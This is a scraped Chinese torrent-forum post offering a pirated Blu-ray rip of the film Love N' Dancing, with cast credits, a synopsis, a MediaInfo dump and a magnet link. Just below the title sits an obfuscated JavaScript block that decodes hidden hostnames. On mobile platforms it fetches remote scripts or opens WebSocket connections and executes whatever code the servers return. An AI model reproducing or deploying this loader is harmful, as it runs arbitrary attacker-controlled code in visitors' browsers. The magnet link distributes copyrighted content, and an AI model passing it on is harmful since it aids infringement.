爱在舞动[中文字幕].Love.N'.Dancing.2009.1080p.BluRay.x265.10bit.AC3 3.58GB

版主小s 25天前 203

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 爱在舞动 / 爱情与舞蹈
◎片  名 Love N' Dancing
◎年  代 2009
◎产  地 美国
◎类  别 剧情 / 爱情
◎语  言 英语
◎上映日期 2008-05-14
◎IMDb链接 https://www.imdb.com/title/tt1028581/
◎豆瓣评分 6.4/10 (681人评价)
◎豆瓣链接 https://movie.douban.com/subject/3671858/
◎片  长 95分钟
◎导  演 罗伯特·伊斯科夫 Robert Iscove (id:1013749)
◎编  剧 汤姆·马洛伊 Tom Malloy (id:1116238)
◎演  员 汤姆·马洛伊 Tom Malloy (id:1116238)
       比利·赞恩 Billy Zane (id:1031864)
       本吉·休默 Benji Schwimmer (id:1014244)
        Kenny Resch (id:1226100)
       伊莉斯·埃伯利 Elise Eberle (id:1229503)
       基莎·塞拉 Kisha Sierra (id:1237701)
        Joey Montoya (id:1237978)
        Kieran Sequoia (id:1238945)
        Antony Hall (id:1245062)
        TJ Williams (id:1268611)
       大卫·F·马克斯韦尔 David F. Maxwell (id:1195353)
       卡罗琳·雷亚 Caroline Rhea (id:1000206)
       瑞秋·德拉彻 Rachel Dratch (id:1032014)
       凯瑟琳·玛丽·斯图尔特 Catherine Mary Stewart (id:1044966)
       贝蒂·怀特 Betty White (id:1013765)
       格雷戈里·哈里森 Gregory Harrison (id:1055958)
       莱拉·阿尔切里 Leila Arcieri (id:1056466)
       普鲁瓦·贝迪 Purva Bedi (id:1066763)
       阿荣·希弗 Arron Shiver (id:1009669)
       马里克·潘考利 Maulik Pancholy (id:1164660)
       艾米·斯马特 Amy Smart (id:1000048)
       Brandon Baker Brandon Baker (id:1176845)
       汤姆·马洛伊 Tom Malloy (id:1116238)
       Casey O. Rohrs Casey O. Rohrs (id:1295937)
       Donald Paul Pemrick Donald Paul Pemrick (id:1294230)
       朱迪·亨德森 Judy Henderson (id:1286419)
       Dean E. Fronk Dean E. Fronk (id:1284258)
       David Van Woert David Van Woert (id:1053127)

◎标  签 美国 / 舞蹈 / 爱情 / 歌舞 / 美国电影 / 2008 / 电影 / dancing

◎简  介
  杰西卡(艾米·斯马特 Amy Smart 饰)是一名普通的教师,每日两点一线的枯燥生活逐渐消磨了她的激情与热情,一门心思扑在工作上的丈夫自然无暇顾及妻子的失落的郁闷,杰西卡渐渐失去了往日的生气。一次偶然中,杰西卡结识了名叫杰克(Tom Malloy 饰)的男子,热情奔放的杰克曾经凭借出色的舞技获得过世界冠军,这一对男女立刻就被彼此迥异的个性给吸引了。                                    
                                一个疯狂的念头在杰西卡的脑海中产生了,她和杰克组成了团队,向金冠发起了新的挑战。杰克曾经的搭档康妮(Nicola Royston 饰)是个嫉妒心爆棚的女人,眼看着帅气的杰克有了“新欢”,内心愤愤不平的她开始了破坏行动。

◎获奖情况 (共1项)
  第11届美国青少年选择奖 (2009)
  最佳音乐/舞蹈电影女演员(提名)
   └──艾米·斯马特 (id:1000048)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 314382790327669278431109789669065053052 (0xEC83EC49054B89AE9EBAD4AD78BD537C)

  4. Complete name                            : Love.N'[email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 3.57 GiB

  8. Duration                                 : 1 h 35 min

  9. Overall bit rate                         : 5 381 kb/s

  10. Movie name                               : Love N' Dancing

  11. Encoded date                             : UTC 2021-09-02 04:26:04

  12. Writing application                      : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@Main

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 1 h 35 min

  23. Bit rate                                 : 4 881 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 1 080 pixels

  26. Display aspect ratio                     : 16:9

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.098

  33. Stream size                              : 3.24 GiB (91%)

  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings                        : rc=crf / crf=20.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default                                  : Yes

  37. Forced                                   : No


  38. Audio

  39. ID                                       : 2

  40. ID in the original source medium         : 4352 (0x1100)

  41. Format                                   : AC-3

  42. Format/Info                              : Audio Coding 3

  43. Commercial name                          : Dolby Digital

  44. Codec ID                                 : A_AC3

  45. Duration                                 : 1 h 35 min

  46. Bit rate mode                            : Constant

  47. Bit rate                                 : 448 kb/s

  48. Channel(s)                               : 6 channels

  49. Channel layout                           : L R C LFE Ls Rs

  50. Sampling rate                            : 48.0 kHz

  51. Frame rate                               : 31.250 FPS (1536 SPF)

  52. Compression mode                         : Lossy

  53. Stream size                              : 305 MiB (8%)

  54. Language                                 : English

  55. Service kind                             : Complete Main

  56. Default                                  : Yes

  57. Forced                                   : No

  58. Original source medium                   : Blu-ray


  59. Text #1

  60. ID                                       : 3

  61. ID in the original source medium         : 4610 (0x1202)

  62. Format                                   : PGS

  63. Muxing mode                              : zlib

  64. Codec ID                                 : S_HDMV/PGS

  65. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration                                 : 1 h 28 min

  67. Bit rate                                 : 38.2 kb/s

  68. Count of elements                        : 2905

  69. Stream size                              : 24.1 MiB (1%)

  70. Title                                    : chs

  71. Language                                 : Chinese

  72. Default                                  : Yes

  73. Forced                                   : No

  74. Original source medium                   : Blu-ray


  75. Text #2

  76. ID                                       : 4

  77. ID in the original source medium         : 4611 (0x1203)

  78. Format                                   : PGS

  79. Muxing mode                              : zlib

  80. Codec ID                                 : S_HDMV/PGS

  81. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  82. Duration                                 : 1 h 28 min

  83. Bit rate                                 : 38.5 kb/s

  84. Count of elements                        : 2905

  85. Stream size                              : 24.2 MiB (1%)

  86. Title                                    : cht

  87. Language                                 : Chinese

  88. Default                                  : No

  89. Forced                                   : No

  90. Original source medium                   : Blu-ray


  91. Text #3

  92. ID                                       : 5

  93. ID in the original source medium         : 4608 (0x1200)

  94. Format                                   : PGS

  95. Muxing mode                              : zlib

  96. Codec ID                                 : S_HDMV/PGS

  97. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  98. Duration                                 : 1 h 34 min

  99. Bit rate                                 : 54.2 kb/s

  100. Count of elements                        : 4502

  101. Stream size                              : 36.6 MiB (1%)

  102. Title                                    : eng

  103. Language                                 : English

  104. Default                                  : No

  105. Forced                                   : No

  106. Original source medium                   : Blu-ray


  107. Menu

  108. 00:00:00.000                             : 第 01 章

  109. 00:05:34.167                             : 第 02 章

  110. 00:13:30.643                             : 第 03 章

  111. 00:21:18.068                             : 第 04 章

  112. 00:28:33.878                             : 第 05 章

  113. 00:35:54.610                             : 第 06 章

  114. 00:42:53.571                             : 第 07 章

  115. 00:51:13.862                             : 第 08 章

  116. 00:59:47.750                             : 第 09 章

  117. 01:10:07.578                             : 第 10 章

  118. 01:19:24.843                             : 第 11 章

  119. 01:28:52.577                             : 第 12 章



TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:B5B9651A67AAD7D84592E3FDBD744B59CB13EBE2
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回